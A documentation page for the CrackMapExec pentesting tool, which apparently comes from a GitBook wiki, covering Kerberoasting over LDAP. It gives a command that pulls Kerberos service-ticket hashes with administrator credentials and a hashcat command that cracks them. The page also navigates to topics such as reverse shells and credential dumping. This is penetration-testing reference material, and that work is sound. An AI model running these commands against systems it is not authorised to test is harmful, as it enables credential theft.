CrackMapExec 5.4.0
Home
Discord
Author
Search
⌃
K
Links
💞
A swiss army knife for Pentesting networks
Author
1⃣
Tool
🟢
Linux
Docker
🟢
Parameters
Scan Optimization
🟢
Target Definition - CME
Protocols
1⃣
SMB CrackMapExec
2⃣
LDAP CrackMapExec
🟠
LDAP Modules List
🟠
Extract LDAP users descriptions
🟢
Extract Network Information
🟢
Trust for Delegation
🟢
Admin Count
🟠
Kerberoasting
🟠
ASREPRoast
🟢
LAPS
3⃣
MsSQL CrackMapExec
FTP CrackMapExec
SSH CrackMapExec
RDP CrackMapExec
WinRM CrackMapExec
🥷
Integrations
🔴
BloodHound and CrackMapExec
🔴
DeathStar and CrackMapExec
🥷
Get Reverse Shell
🟢
CME Reverse Shell with Metasploit
🟢
CME Reverse Shell with Empire
🔴
CME Reverse Shell with Covenant
Use Cases
🔥
Scan for SMB Vulnerabilities using CrackMapExec
🔥
Dump Credentials with CrackMapExec
🔥
Anti Virus Bypass with CrackMapExec
🥷
Dump Credentials
Windows Machine
Linux Machine
🥷
Databases
Workspaces
Credentials
Powered By
GitBook
🟠
Kerberoasting
Kerberoasting with CrackMapExec - Retrieve the Kerberos 5 TGS-REP etype 23 hash
crackmapexec ldap 192.168.1.119 -u Administrator -p 'Password!' --kerberoasting output.txt
Crack The Hash
hashcat -m 13100 output.txt wordlist.txt
Previous
Admin Count
Next
ASREPRoast
Last modified
3mo ago